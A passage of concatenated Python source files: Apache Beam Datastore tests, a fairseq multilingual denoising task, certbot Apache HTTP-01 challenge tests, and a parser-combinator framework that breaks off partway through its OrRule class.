        self._PROJECT, namespace, helper.make_latest_timestamp_query(namespace))
    timestamp_resp = self.make_stats_response(
        {'timestamp': datastore_helper.from_timestamp(timestamp)})
    kind_stat_req = helper.make_request(
        self._PROJECT, namespace, helper.make_kind_stats_query(
            namespace, self._query.kind[0].name,
            datastore_helper.micros_from_timestamp(timestamp)))
    kind_stat_resp = self.make_stats_response(
        {'entity_bytes': entity_bytes})

    def fake_run_query(req):
      if req == timestamp_req:
        return timestamp_resp
      elif req == kind_stat_req:
        return kind_stat_resp
      else:
        # The unexpected request is already part of the error message; the
        # stray Python 2 `print` statement that used to live here was both
        # debug noise and a syntax error under Python 3.
        raise ValueError("Unknown req: %s" % req)

    self._mock_datastore.run_query.side_effect = fake_run_query
    self.assertEqual(entity_bytes, ReadFromDatastore.get_estimated_size_bytes(
        self._PROJECT, namespace, self._query, self._mock_datastore))
    self.assertEqual(self._mock_datastore.run_query.call_args_list,
                     [call(timestamp_req), call(kind_stat_req)])

  def make_stats_response(self, property_map):
    """Build a RunQueryResponse holding a single stats entity."""
    resp = datastore_pb2.RunQueryResponse()
    entity_result = resp.batch.entity_results.add()
    datastore_helper.add_properties(entity_result.entity, property_map)
    return resp

  def split_query(self, query, num_splits):
    """Generate dummy query splits."""
    split_queries = []
    for _ in range(0, num_splits):
      q = query_pb2.Query()
      q.CopyFrom(query)
      split_queries.append(q)
    return split_queries
@unittest.skipIf(datastore_pb2 is None, 'GCP dependencies are not installed')
class DynamicWriteBatcherTest(unittest.TestCase):
  """Tests for _Mutate._DynamicBatchSizer latency-based batch sizing."""

  def setUp(self):
    self._batcher = _Mutate._DynamicBatchSizer()

  # If possible, keep these test cases aligned with the Java test cases in
  # DatastoreV1Test.java
  # (assertEquals is a deprecated unittest alias; assertEqual is used below.)
  def test_no_data(self):
    """Without any latency reports, the initial batch size is used."""
    self.assertEqual(_Mutate._WRITE_BATCH_INITIAL_SIZE,
                     self._batcher.get_batch_size(0))

  def test_fast_queries(self):
    """Fast commits should grow the batch size to the maximum."""
    self._batcher.report_latency(0, 1000, 200)
    self._batcher.report_latency(0, 1000, 200)
    self.assertEqual(_Mutate._WRITE_BATCH_MAX_SIZE,
                     self._batcher.get_batch_size(0))

  def test_slow_queries(self):
    """Slow commits should shrink the batch size."""
    self._batcher.report_latency(0, 10000, 200)
    self._batcher.report_latency(0, 10000, 200)
    self.assertEqual(100, self._batcher.get_batch_size(0))

  def test_size_not_below_minimum(self):
    """Even very slow commits never push the size below the minimum."""
    self._batcher.report_latency(0, 30000, 50)
    self._batcher.report_latency(0, 30000, 50)
    self.assertEqual(_Mutate._WRITE_BATCH_MIN_SIZE,
                     self._batcher.get_batch_size(0))

  def test_sliding_window(self):
    """Old latency reports fall out of the sliding window."""
    self._batcher.report_latency(0, 30000, 50)
    self._batcher.report_latency(50000, 5000, 200)
    self._batcher.report_latency(100000, 5000, 200)
    self.assertEqual(200, self._batcher.get_batch_size(150000))
# Allow running this test module directly with the stock unittest runner.
if __name__ == '__main__':
  unittest.main()
| |
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import logging
import os
import numpy as np
from fairseq.data import (
data_utils,
Dictionary,
AppendTokenDataset,
ConcatDataset,
DenoisingDataset,
PrependTokenDataset,
ResamplingDataset,
SortDataset,
TokenBlockDataset,
)
from .denoising import DenoisingTask
from fairseq.data.encoders.utils import get_whole_word_mask
from fairseq.tasks import register_task
logger = logging.getLogger(__name__)
@register_task('multilingual_denoising')
class MultilingualDenoisingTask(DenoisingTask):
    """BART-style denoising over multiple monolingual corpora, with
    temperature-based resampling across languages for the train split."""

    @staticmethod
    def add_args(parser):
        DenoisingTask.add_args(parser)
        parser.add_argument('--multilang-sampling-alpha', type=float, default=1.0,
                            help='smoothing alpha for sample ratios across multiple datasets')
        parser.add_argument('--add-lang-token', default=False, action='store_true')
        parser.add_argument('--langs', type=str, help="language ids we are considering", default=None)
        parser.add_argument('--no-whole-word-mask-langs', type=str, default='', metavar='N',
                            help='languages without spacing between words dont support whole word masking')

    @classmethod
    def setup_task(cls, args, **kwargs):
        """Setup the task.
        """
        paths = args.data.split(':')
        assert len(paths) > 0
        dictionary = Dictionary.load(os.path.join(paths[0], 'dict.txt'))

        data_path = paths[0]
        if args.langs is None:
            # Infer the language list from the sub-directories of the data dir.
            languages = sorted([
                name for name in os.listdir(data_path)
                if os.path.isdir(os.path.join(data_path, name))
            ])
        else:
            languages = args.langs.split(',')

        if args.add_lang_token:
            for lang in languages:
                dictionary.add_symbol('[{}]'.format(lang))

        logger.info("dictionary: {} types".format(len(dictionary)))
        if not hasattr(args, 'shuffle_instance'):
            args.shuffle_instance = False
        return cls(args, dictionary)

    def __init__(self, args, dictionary):
        super().__init__(args, dictionary)
        self.dictionary = dictionary
        self.seed = args.seed

        # add mask token
        self.mask_idx = self.dictionary.add_symbol('<mask>')
        self.langs = args.langs
        self.args = args

    def _get_sample_prob(self, dataset_lens):
        """
        Get smoothed sampling probability by languages. This helps low resource
        languages by upsampling them.
        """
        prob = dataset_lens / dataset_lens.sum()
        smoothed_prob = prob ** self.args.multilang_sampling_alpha
        smoothed_prob = smoothed_prob / smoothed_prob.sum()
        return smoothed_prob

    def load_dataset(self, split, epoch=1, combine=False, **kwargs):
        """Load a given dataset split.

        Args:
            split (str): name of the split (e.g., train, valid, test)
        """
        paths = self.args.data.split(':')
        assert len(paths) > 0
        data_path = paths[(epoch - 1) % len(paths)]
        split_path = os.path.join(data_path, split)

        if self.langs is None:
            languages = sorted([
                name for name in os.listdir(data_path)
                if os.path.isdir(os.path.join(data_path, name))
            ])
        else:
            languages = self.langs.split(',')
            # Only explicitly requested languages are checked for existence.
            for name in languages:
                p = os.path.join(data_path, name)
                assert os.path.exists(p), "data not found: {}".format(p)

        logger.info("Training on {0} languages: {1}".format(len(languages), languages))
        # BUG FIX: the mapping used to be passed as a %-style logging argument
        # with no placeholder in the format string, so it was never rendered.
        logger.info("Language to id mapping: %s", {
            lang: lang_id for lang_id, lang in enumerate(languages)
        })

        mask_whole_words = get_whole_word_mask(self.args, self.dictionary)
        language_without_segmentations = self.args.no_whole_word_mask_langs.split(',')
        lang_datasets = []
        for language in languages:
            split_path = os.path.join(data_path, language, split)

            dataset = data_utils.load_indexed_dataset(
                split_path,
                self.source_dictionary,
                self.args.dataset_impl,
                combine=combine,
            )
            if dataset is None:
                raise FileNotFoundError('Dataset not found: {} ({})'.format(split, split_path))

            end_token = self.source_dictionary.index('[{}]'.format(language)) \
                if self.args.add_lang_token else self.source_dictionary.eos()

            # create continuous blocks of tokens
            dataset = TokenBlockDataset(
                dataset,
                dataset.sizes,
                self.args.tokens_per_sample - 2,  # reserve room for <s> and the end token
                pad=self.source_dictionary.pad(),
                eos=end_token,
                break_mode=self.args.sample_break_mode,
            )
            logger.info('loaded {} blocks from: {}'.format(len(dataset), split_path))

            # prepend beginning-of-sentence token (<s>, equiv. to [CLS] in BERT)
            dataset = PrependTokenDataset(dataset, self.source_dictionary.bos())
            dataset = AppendTokenDataset(dataset, end_token)

            # Languages without word spacing cannot use whole-word masking.
            lang_mask_whole_words = mask_whole_words if language not in language_without_segmentations else None
            lang_dataset = DenoisingDataset(
                dataset,
                dataset.sizes,
                self.dictionary,
                self.mask_idx,
                lang_mask_whole_words,
                shuffle=self.args.shuffle_instance,
                seed=self.seed,
                args=self.args,
                eos=None if not self.args.add_lang_token else self.source_dictionary.index('[{}]'.format(language)),
            )
            lang_datasets.append(lang_dataset)

        dataset_lengths = np.array(
            [len(d) for d in lang_datasets],
            dtype=float,
        )
        logger.info(
            'loaded total {} blocks for all languages'.format(
                int(dataset_lengths.sum()),
            )
        )
        if split == self.args.train_subset:
            # For train subset, additionally up or down sample languages.
            sample_probs = self._get_sample_prob(dataset_lengths)
            logger.info(
                "Sample probability by language: {}".format({
                    lang: "{0:.4f}".format(sample_probs[lang_id])
                    for lang_id, lang in enumerate(languages)
                })
            )
            size_ratio = (sample_probs * dataset_lengths.sum()) / dataset_lengths
            logger.info(
                "Up/Down Sampling ratio by language: {}".format({
                    lang: "{0:.2f}".format(size_ratio[lang_id])
                    for lang_id, lang in enumerate(languages)
                })
            )

            resampled_lang_datasets = [
                ResamplingDataset(
                    lang_datasets[i],
                    size_ratio=size_ratio[i],
                    seed=self.args.seed,
                    epoch=epoch,
                    replace=size_ratio[i] >= 1.0,
                )
                for i, _ in enumerate(lang_datasets)
            ]
            dataset = ConcatDataset(
                resampled_lang_datasets,
            )
        else:
            dataset = ConcatDataset(lang_datasets)
            # Also register one per-language split so each language can be
            # validated individually.
            lang_splits = [split]
            for lang_id, lang_dataset in enumerate(lang_datasets):
                split_name = split + '_' + languages[lang_id]
                lang_splits.append(split_name)
                self.datasets[split_name] = lang_dataset

            if split in self.args.valid_subset:
                self.args.valid_subset = self.args.valid_subset.replace(
                    split, ','.join(lang_splits)
                )

        with data_utils.numpy_seed(self.args.seed + epoch):
            shuffle = np.random.permutation(len(dataset))

        self.datasets[split] = SortDataset(
            dataset,
            sort_order=[
                shuffle,
                dataset.sizes,
            ],
        )
| |
"""Test for certbot_apache._internal.http_01."""
import unittest
import errno
from typing import List
try:
import mock
except ImportError: # pragma: no cover
from unittest import mock # type: ignore
from acme import challenges
from certbot import achallenges
from certbot import errors
from certbot.compat import filesystem
from certbot.compat import os
from certbot.tests import acme_util
from certbot_apache._internal.parser import get_aug_path
import util
NUM_ACHALLS = 3
class ApacheHttp01Test(util.ApacheTest):
    """Test for certbot_apache._internal.http_01.ApacheHttp01."""
    def setUp(self, *args, **kwargs): # pylint: disable=arguments-differ
        # Builds one HTTP-01 achall per tested vhost, with distinct 16-byte
        # tokens (b'a'*16, b'b'*16, ...), and marks the Apache modules the
        # plugin expects as already loaded.
        super().setUp(*args, **kwargs)
        self.account_key = self.rsa512jwk
        self.achalls: List[achallenges.KeyAuthorizationAnnotatedChallenge] = []
        vh_truth = util.get_vh_truth(
            self.temp_dir, "debian_apache_2_4/multiple_vhosts")
        # Takes the vhosts for encryption-example.demo, certbot.demo
        # and vhost.in.rootconf
        self.vhosts = [vh_truth[0], vh_truth[3], vh_truth[10]]
        for i in range(NUM_ACHALLS):
            self.achalls.append(
                achallenges.KeyAuthorizationAnnotatedChallenge(
                    challb=acme_util.chall_to_challb(
                        challenges.HTTP01(token=((chr(ord('a') + i).encode() * 16))),
                        "pending"),
                    domain=self.vhosts[i].name, account_key=self.account_key))
        modules = ["ssl", "rewrite", "authz_core", "authz_host"]
        for mod in modules:
            self.config.parser.modules["mod_{0}.c".format(mod)] = None
            self.config.parser.modules[mod + "_module"] = None
        from certbot_apache._internal.http_01 import ApacheHttp01
        self.http = ApacheHttp01(self.config)
    def test_empty_perform(self):
        """perform() with no challenges added produces no responses."""
        self.assertEqual(len(self.http.perform()), 0)
    @mock.patch("certbot_apache._internal.configurator.ApacheConfigurator.enable_mod")
    def test_enable_modules_apache_2_2(self, mock_enmod):
        """Apache 2.2 should enable authz_host (not authz_core)."""
        self.config.version = (2, 2)
        del self.config.parser.modules["authz_host_module"]
        del self.config.parser.modules["mod_authz_host.c"]
        enmod_calls = self.common_enable_modules_test(mock_enmod)
        self.assertEqual(enmod_calls[0][0][0], "authz_host")
    @mock.patch("certbot_apache._internal.configurator.ApacheConfigurator.enable_mod")
    def test_enable_modules_apache_2_4(self, mock_enmod):
        """Apache 2.4 should enable authz_core."""
        del self.config.parser.modules["authz_core_module"]
        del self.config.parser.modules["mod_authz_host.c"]
        enmod_calls = self.common_enable_modules_test(mock_enmod)
        self.assertEqual(enmod_calls[0][0][0], "authz_core")
    def common_enable_modules_test(self, mock_enmod):
        """Tests enabling mod_rewrite and other modules."""
        del self.config.parser.modules["rewrite_module"]
        del self.config.parser.modules["mod_rewrite.c"]
        self.http.prepare_http01_modules()
        self.assertIs(mock_enmod.called, True)
        calls = mock_enmod.call_args_list
        other_calls = []
        for call in calls:
            if call[0][0] != "rewrite":
                other_calls.append(call)
        # If these lists are equal, we never enabled mod_rewrite
        self.assertNotEqual(calls, other_calls)
        return other_calls
    def test_same_vhost(self):
        """Two achalls mapping to one vhost (name + alias) share that vhost."""
        vhost = next(v for v in self.config.vhosts if v.name == "certbot.demo")
        achalls = [
            achallenges.KeyAuthorizationAnnotatedChallenge(
                challb=acme_util.chall_to_challb(
                    challenges.HTTP01(token=((b'a' * 16))),
                    "pending"),
                domain=vhost.name, account_key=self.account_key),
            achallenges.KeyAuthorizationAnnotatedChallenge(
                challb=acme_util.chall_to_challb(
                    challenges.HTTP01(token=((b'b' * 16))),
                    "pending"),
                domain=next(iter(vhost.aliases)), account_key=self.account_key)
        ]
        self.common_perform_test(achalls, [vhost])
    def test_anonymous_vhost(self):
        """A domain matching no vhost configures all non-SSL vhosts."""
        vhosts = [v for v in self.config.vhosts if not v.ssl]
        achalls = [
            achallenges.KeyAuthorizationAnnotatedChallenge(
                challb=acme_util.chall_to_challb(
                    challenges.HTTP01(token=((b'a' * 16))),
                    "pending"),
                domain="something.nonexistent", account_key=self.account_key)]
        self.common_perform_test(achalls, vhosts)
    def test_configure_multiple_vhosts(self):
        """A name served by two vhosts configures both of them."""
        vhosts = [v for v in self.config.vhosts if "duplicate.example.com" in v.get_names()]
        self.assertEqual(len(vhosts), 2)
        achalls = [
            achallenges.KeyAuthorizationAnnotatedChallenge(
                challb=acme_util.chall_to_challb(
                    challenges.HTTP01(token=((b'a' * 16))),
                    "pending"),
                domain="duplicate.example.com", account_key=self.account_key)]
        self.common_perform_test(achalls, vhosts)
    def test_configure_name_and_blank(self):
        """Both the named vhost and catch-all (nameless) vhosts get configured."""
        domain = "certbot.demo"
        vhosts = [v for v in self.config.vhosts if v.name == domain or v.name is None]
        achalls = [
            achallenges.KeyAuthorizationAnnotatedChallenge(
                challb=acme_util.chall_to_challb(
                    challenges.HTTP01(token=((b'a' * 16))),
                    "pending"),
                domain=domain, account_key=self.account_key),
        ]
        self.common_perform_test(achalls, vhosts)
    def test_no_vhost(self):
        """An http01_port no vhost listens on makes perform() raise."""
        for achall in self.achalls:
            self.http.add_chall(achall)
        self.config.config.http01_port = 12345
        self.assertRaises(errors.PluginError, self.http.perform)
    def test_perform_1_achall_apache_2_2(self):
        """One achall against Apache 2.2."""
        self.combinations_perform_test(num_achalls=1, minor_version=2)
    def test_perform_1_achall_apache_2_4(self):
        """One achall against Apache 2.4."""
        self.combinations_perform_test(num_achalls=1, minor_version=4)
    def test_perform_2_achall_apache_2_2(self):
        """Two achalls against Apache 2.2."""
        self.combinations_perform_test(num_achalls=2, minor_version=2)
    def test_perform_2_achall_apache_2_4(self):
        """Two achalls against Apache 2.4."""
        self.combinations_perform_test(num_achalls=2, minor_version=4)
    def test_perform_3_achall_apache_2_2(self):
        """Three achalls against Apache 2.2."""
        self.combinations_perform_test(num_achalls=3, minor_version=2)
    def test_perform_3_achall_apache_2_4(self):
        """Three achalls against Apache 2.4."""
        self.combinations_perform_test(num_achalls=3, minor_version=4)
    def test_activate_disabled_vhost(self):
        """A disabled vhost gets enabled (an Include directive is added)."""
        vhosts = [v for v in self.config.vhosts if v.name == "certbot.demo"]
        achalls = [
            achallenges.KeyAuthorizationAnnotatedChallenge(
                challb=acme_util.chall_to_challb(
                    challenges.HTTP01(token=((b'a' * 16))),
                    "pending"),
                domain="certbot.demo", account_key=self.account_key)]
        vhosts[0].enabled = False
        self.common_perform_test(achalls, vhosts)
        matches = self.config.parser.find_dir(
            "Include", vhosts[0].filep,
            get_aug_path(self.config.parser.loc["default"]))
        self.assertEqual(len(matches), 1)
    def combinations_perform_test(self, num_achalls, minor_version):
        """Test perform with the given achall count and Apache version."""
        achalls = self.achalls[:num_achalls]
        vhosts = self.vhosts[:num_achalls]
        self.config.version = (2, minor_version)
        self.common_perform_test(achalls, vhosts)
    def common_perform_test(self, achalls, vhosts):
        """Tests perform with the given achalls."""
        challenge_dir = self.http.challenge_dir
        self.assertIs(os.path.exists(challenge_dir), False)
        for achall in achalls:
            self.http.add_chall(achall)
        expected_response = [
            achall.response(self.account_key) for achall in achalls]
        self.assertEqual(self.http.perform(), expected_response)
        # The challenge dir must exist and be world-readable (0o755 minimum).
        self.assertIs(os.path.isdir(self.http.challenge_dir), True)
        self.assertIs(filesystem.has_min_permissions(self.http.challenge_dir, 0o755), True)
        self._test_challenge_conf()
        for achall in achalls:
            self._test_challenge_file(achall)
        # Every configured vhost must Include both generated conf snippets.
        for vhost in vhosts:
            matches = self.config.parser.find_dir("Include",
                                                  self.http.challenge_conf_pre,
                                                  vhost.path)
            self.assertEqual(len(matches), 1)
            matches = self.config.parser.find_dir("Include",
                                                  self.http.challenge_conf_post,
                                                  vhost.path)
            self.assertEqual(len(matches), 1)
        self.assertIs(os.path.exists(challenge_dir), True)
    @mock.patch("certbot_apache._internal.http_01.filesystem.makedirs")
    def test_failed_makedirs(self, mock_makedirs):
        """A permission error creating the challenge dir becomes PluginError."""
        mock_makedirs.side_effect = OSError(errno.EACCES, "msg")
        self.http.add_chall(self.achalls[0])
        self.assertRaises(errors.PluginError, self.http.perform)
    def _test_challenge_conf(self):
        """Check the generated pre/post conf snippets' contents."""
        with open(self.http.challenge_conf_pre) as f:
            pre_conf_contents = f.read()
        with open(self.http.challenge_conf_post) as f:
            post_conf_contents = f.read()
        self.assertIn("RewriteEngine on", pre_conf_contents)
        self.assertIn("RewriteRule", pre_conf_contents)
        self.assertIn(self.http.challenge_dir, post_conf_contents)
        # Access-control syntax differs between Apache 2.2 and 2.4.
        if self.config.version < (2, 4):
            self.assertIn("Allow from all", post_conf_contents)
        else:
            self.assertIn("Require all granted", post_conf_contents)
    def _test_challenge_file(self, achall):
        """Check the on-disk validation file for one achall."""
        name = os.path.join(self.http.challenge_dir, achall.chall.encode("token"))
        validation = achall.validation(self.account_key)
        # The validation file must be world-readable (0o644 minimum).
        self.assertIs(filesystem.has_min_permissions(name, 0o644), True)
        with open(name, 'rb') as f:
            self.assertEqual(f.read(), validation.encode())
# Allow running this test module directly with the stock unittest runner.
if __name__ == "__main__":
    unittest.main()  # pragma: no cover
| |
"""
Parsing framework in Python, similar to pyparsing and boost::spirit
Author: Markus Brueckner (dev@slash-me.net)
License: This code is in the public domain
FAQ:
What's 'yeanpypa' anyway?
YEt ANother PYthon PArser framework. Virtually perfectly creative acronym...
"""
import logging
class InputReader(object):
    """
    The InputReader serves as an abstraction to read chars from a
    string with a state. The reader provides tools to save the current
    reading position and a stack to set checkpoints where to return to
    later.
    """
    def __init__(self, string, ignore_white):
        """
        Create this reader with the given string.

        @param string: The string the reader reads from.
        @type string: str
        @param ignore_white: Whether to ignore whitespaces or not.
        @type ignore_white: boolean
        """
        self.__current_pos = 0
        self.__stack = []
        self.__string = string
        self.__ignore_white = ignore_white

    def getPos(self):
        """
        Return the current position of this reader.

        @return: the current position of the reader in the string
        """
        return self.__current_pos

    def skipWhite(self):
        """
        Skip the whitespace characters from the current position on.
        """
        while (self.__current_pos < len(self.__string) and
               self.__string[self.__current_pos].isspace()):
            self.__current_pos += 1

    def getString(self, length):
        """
        Get a substring of the string from this reader and advance the
        reader's position.

        Note that even if ignore_whitespace is True, the returned string
        may contain whitespace (only *leading* whitespace is skipped).

        @param length: The length of the string to return
        @type length: int
        @return: A substring of the given length.
        @raise EndOfStringException: if fewer than ``length`` characters remain.
        """
        if self.__ignore_white:
            self.skipWhite()
        if self.__current_pos + length > len(self.__string):
            raise EndOfStringException()
        start = self.__current_pos
        self.__current_pos += length
        return self.__string[start:self.__current_pos]

    def getChar(self):
        """
        Get a single character from the string.

        This method returns the next character of the string. If
        ignore_whitespace is True, this will be the next non-whitespace
        character.

        @return: The next character of the string.
        @raise EndOfStringException: if no character is left to read.
        """
        # BUG FIX: skip whitespace *before* the bounds check. Previously a
        # whitespace-only tail passed the pos == len check, skipWhite() then
        # advanced to the end, and indexing raised IndexError instead of
        # EndOfStringException. (A duplicated debug-log line was also removed.)
        if self.__ignore_white:
            self.skipWhite()
        if self.__current_pos >= len(self.__string):
            raise EndOfStringException()
        logging.debug("Getting char at position %d", self.__current_pos)
        char = self.__string[self.__current_pos]
        self.__current_pos += 1
        return char

    def checkPoint(self):
        """
        Set a checkpoint in the reader. A checkpoint is kind of like a safety
        net where the parser can return to later if parsing failed at any
        later point in the string. The checkpoints are managed in a
        stack-like fashion: the parser can always return to the last
        checkpoint set.
        """
        self.__stack.append(self.__current_pos)

    def rollback(self):
        """
        Rollback the parser to the last checkpoint set. This is called
        by the rules internally whenever parsing fails and a rollback
        is necessary.

        @raise EmptyStackException: if no checkpoint is on the stack.
        """
        if not self.__stack:
            raise EmptyStackException()
        self.__current_pos = self.__stack.pop()

    def deleteCheckpoint(self):
        """
        Delete the newest checkpoint without rolling back. If a rule
        successfully matches, it deletes the previously saved
        checkpoint to clean up the parser stack.

        @raise EmptyStackException: if no checkpoint is on the stack.
        """
        if not self.__stack:
            raise EmptyStackException()
        self.__stack.pop()

    def fullyConsumed(self):
        """
        Return whether the string was fully consumed.

        @return: True if the string was read to the last byte, False otherwise
        """
        return len(self.__string) == self.__current_pos

    def getIgnoreState(self):
        """
        Return whether the reader is set to ignore whitespaces.

        @return: True if the reader currently ignores whitespaces, False otherwise.
        """
        return self.__ignore_white

    def setIgnoreState(self, state):
        """
        Set the ignore state of the reader. This call tells the reader
        whether it should ignore whitespaces or not.

        @param state: True to ignore whitespace, False to return them
        @type state: boolean
        """
        self.__ignore_white = state
class ParseException(Exception):
    """
    An exception thrown on parser error. This exception is thrown by
    the parser in case of a non-correctable error. It contains a human
    readable message that further explains the reason of the
    exception.
    """
    def __init__(self, msg):
        """
        Initialize the exception with the given message.

        @param msg: The message further describing the reason for this exception.
        @type msg: str
        """
        # Forward to Exception so that e.args, repr() and pickling behave
        # like a normal exception (previously args was always empty).
        super(ParseException, self).__init__(msg)
        self.__msg = msg

    def __str__(self):
        """
        Return a human readable representation of this exception.

        @return: a human readable representation of the exception.
        """
        return "ParseException: %s" % self.__msg
class EndOfStringException(Exception):
    """
    Exception used internally by the InputReader to signal the end of
    the input string (raised by getChar()/getString() when a read would
    run past the last character).
    """
    pass
class ParseResult(object):
    """
    Result of a parser run, as returned by the parse() function.

    It bundles the InputReader that was used (so callers can ask whether
    the whole input was consumed) together with the list of tokens the
    parser produced.
    """
    def __init__(self, input_reader, token):
        """
        Build the result object.

        @param input_reader: The InputReader used by the parser.
        @type input_reader: InputReader
        @param token: The list of tokens generated by the parser.
        @type token: list
        """
        self.__token = token
        self.__input_reader = input_reader

    def full(self):
        """
        Tell whether the parser consumed the complete input.

        @return True if the input was fully consumed, False otherwise.
        """
        reader = self.__input_reader
        return reader.fullyConsumed()

    def getTokens(self):
        """
        Return the tokens produced by the parser run.

        @return: A list of token generated by the parser.
        """
        return self.__token
class Rule(object):
    """
    The basic entity of a grammar: the rule. This class doesn't
    provide any parsing functionality on its own. It merely provides
    some basic functions shared by all Rule classes.
    """
    # Class-level defaults; setAction()/hide() create per-instance
    # attributes, so individual rules do not affect each other.
    action = None
    hide_token = False

    def match(self, input_reader):
        """
        Match the given rule in the string from the given position on.
        Subclasses must override this method.

        (BUG FIX: the original signature was ``match(input_reader)`` without
        ``self``, which made the base method uncallable on instances.)

        @param input_reader: The InputReader to read the input from.
        @type input_reader: InputReader
        @return: a list of token the rule matched.
        """
        raise NotImplementedError("Rule subclasses must implement match()")

    def __add__(self, second_rule):
        """
        Define an operator to concat two rules. The expressiveness of
        the 'pseudo-language' defined by the framework heavily relies
        on operator overloading. The +-operator serves as a 'followed
        by' expression.

        @param second_rule: The right operand of the +-operator which
                            follows this object in grammar terms.
        @type second_rule: Rule
        @return An AndRule-object connecting these two rules appropriately.
        """
        return AndRule(self, second_rule)

    def __or__(self, second_rule):
        """
        Define an operator to concat two rules via OR. The
        expressiveness of the 'pseudo-language' defined by the
        framework heavily relies on operator overloading. The
        |-operator serves as a 'OR' expression, defining two
        alternative matches.

        @param second_rule: The right operand of the |-operator which
                            follows this object in grammar terms.
        @type second_rule: Rule
        @return An OrRule-object connecting these two rules appropriately.
        """
        return OrRule(self, second_rule)

    def setAction(self, action):
        """
        Set the action to execute on a rule match. Action may be any callable
        that takes one parameter. The parameter is a list of token the rule
        matched. The action may manipulate the token returned by returning
        a different token list.

        @param action: The callable to execute if the rule matched.
        @type action: Callable
        @return: a reference to the rule itself
        """
        self.action = action
        return self

    def callAction(self, param):
        """
        Call the action attached to this rule. The given parameter is passed
        to the action; a non-list parameter is wrapped in a list first.

        @param param: The parameter (token list) to pass to the action.
        @type param: list
        """
        if self.action:
            if isinstance(param, list):
                return self.action(param)
            return self.action([param])
        return param

    def hide(self):
        """
        Tell this rule to not produce any token output. The rule
        matches its token as normal but does not return any of them.

        @return self
        """
        self.hide_token = True
        return self

    def returnToken(self, token):
        """
        Helper function encapsulating the hide()-functionality. This method
        returns the token if self.hide_token is False and None otherwise.

        @param token: The token to return
        @return: token if self.hide_token==False, None otherwise
        """
        if self.hide_token:
            return None
        return token
class Literal(Rule):
    """
    Rule matching an exact string.

    The next len(string) characters of the input are compared against
    the literal, regardless of whether the input reader ignores
    whitespace or not.
    """

    def __init__(self, string):
        """
        @param string: The exact text this rule instance should match.
        @type string: str
        """
        self.__string = string

    def __str__(self):
        """Return a quoted representation of this rule."""
        return "\"%s\"" % self.__string

    def match(self, input_reader):
        """
        Match the literal against the input.

        @param input_reader: The input reader to read the string from.
        @type input_reader: InputReader
        @return: The matched string.
        """
        expected = self.__string
        input_reader.checkPoint()
        try:
            actual = input_reader.getString(len(expected))
        except EndOfStringException:
            input_reader.rollback()
            raise ParseException("Expected '%s' at end of string" % expected)
        if actual != expected:
            input_reader.rollback()
            raise ParseException("Expected '%s' at position %d. Got '%s'"
                                 % (expected, input_reader.getPos(), actual))
        input_reader.deleteCheckpoint()
        logging.debug("Matched \"%s\"" % self)
        return self.returnToken(self.callAction([expected]))
class AnyOf(Rule):
    """
    Match exactly one character out of a given charset.

    Whitespace handling follows the input reader's setting: if the
    reader ignores whitespace, a whitespace character is never matched
    even when the charset contains one.
    """

    def __init__(self, set):
        """
        @param set: the charset this rule should match
        @type set: str
        """
        self.__set = set

    def __str__(self):
        """Return a human readable representation of the rule."""
        return "AnyOf(%s)" % self.__set

    def match(self, input_reader):
        """
        Match one charset character against the input.

        @param input_reader: The input to read from.
        @type input_reader: InputReader
        @return: The matched character
        """
        input_reader.checkPoint()
        matched = ''
        try:
            matched = input_reader.getChar()
            accepted = matched in self.__set
        except EndOfStringException:
            accepted = False
        if not accepted:
            input_reader.rollback()
            raise ParseException("Expected char from: [%s] at %d" % (self.__set, input_reader.getPos()))
        input_reader.deleteCheckpoint()
        logging.debug("Matched %s" % matched)
        return self.returnToken(self.callAction([matched]))
class NoneOf(Rule):
    """
    Match one character that is NOT in the given charset.
    """

    def __init__(self, set):
        """
        @param set: The char set the rule should NOT match on.
        @type set: str
        """
        self.__set = set

    def __str__(self):
        """Return a human readable representation of the rule."""
        return "NoneOf(%s)" % self.__set

    def match(self, input_reader):
        """
        Match the rule against the input.

        @param input_reader: The input reader to read the next character from.
        @type input_reader: InputReader
        @return: The matched char not in the set.
        """
        input_reader.checkPoint()
        matched = ''
        try:
            matched = input_reader.getChar()
            accepted = matched not in self.__set
        except EndOfStringException:
            accepted = False
        if not accepted:
            input_reader.rollback()
            raise ParseException("Expected char not from: [%s] at %d" % (self.__set, input_reader.getPos()))
        input_reader.deleteCheckpoint()
        logging.debug("Matched %s" % matched)
        return self.returnToken(self.callAction([matched]))
class AndRule(Rule):
    """
    Two or more rules matching directly after each other.

    This rule concats two or more subrules matching directly after each
    other in the input. The class is not to be used directly; it is
    created by the +-operator of the Rule class.
    """

    def __init__(self, left_rule, right_rule):
        """
        Create the rule object with two sub-rules.

        @param left_rule: The left subrule of the +-operator creating this object.
        @type left_rule: Rule
        @param right_rule: The right subrule of the +-operator creating this object.
        @type right_rule: Rule
        """
        self.__subrules = [left_rule, right_rule]

    def __str__(self):
        """Return a human-readable representation of the rule object."""
        return "(%s)" % ' '.join(map(str, self.__subrules))

    def __add__(self, right_rule):
        """
        Collapse chained +-operators into this single AndRule, keeping
        the resulting parser structure flat.

        @param right_rule: The right rule of the +-operator; added as a subrule.
        @type right_rule: Rule
        @return: self
        """
        self.__subrules.append(right_rule)
        return self

    def match(self, input_reader):
        """
        Match the input against all subrules; the rule as a whole
        matches only if every subrule matches in sequence.

        @param input_reader: The input reader where to read the input from.
        @type input_reader: InputReader
        @return: A list of token matched by that rule
        """
        retval = []
        # Checkpoint before the try so a failing checkpoint can never
        # trigger a rollback of a checkpoint that was never created.
        input_reader.checkPoint()
        try:
            for rule in self.__subrules:
                result = rule.match(input_reader)
                # Hidden subrules yield None; keep only real token.
                # (``is not None`` instead of ``!= None`` — identity test.)
                if result is not None:
                    retval.append(result)
            input_reader.deleteCheckpoint()
        except ParseException:
            input_reader.rollback()
            raise
        return self.returnToken(self.callAction(retval))
# TODO: implement a greedy version of the OR rule (matches the longer match of the two)
class OrRule(Rule):
    """
    A set of alternative rules.

    Matches one of the alternative subrules contained in it, trying
    them in left-to-right order and stopping at the first match. Not
    intended for direct use; created by the |-operator of Rule.
    """

    def __init__(self, left_rule, right_rule):
        """
        @param left_rule: The left operand of the creating |-operator.
        @type left_rule: Rule
        @param right_rule: The right operand of the creating |-operator
        @type right_rule: Rule
        """
        self.__subrules = [left_rule, right_rule]

    def __str__(self):
        """Return a human readable representation of that rule."""
        return "(%s)" % ' | '.join(map(str, self.__subrules))

    def __or__(self, right_rule):
        """
        Collapse chained |-operators into this single OrRule to keep
        the resulting parser structure flat.

        @param right_rule: The right operand of the |-operator.
        @type right_rule: Rule
        @return: self
        """
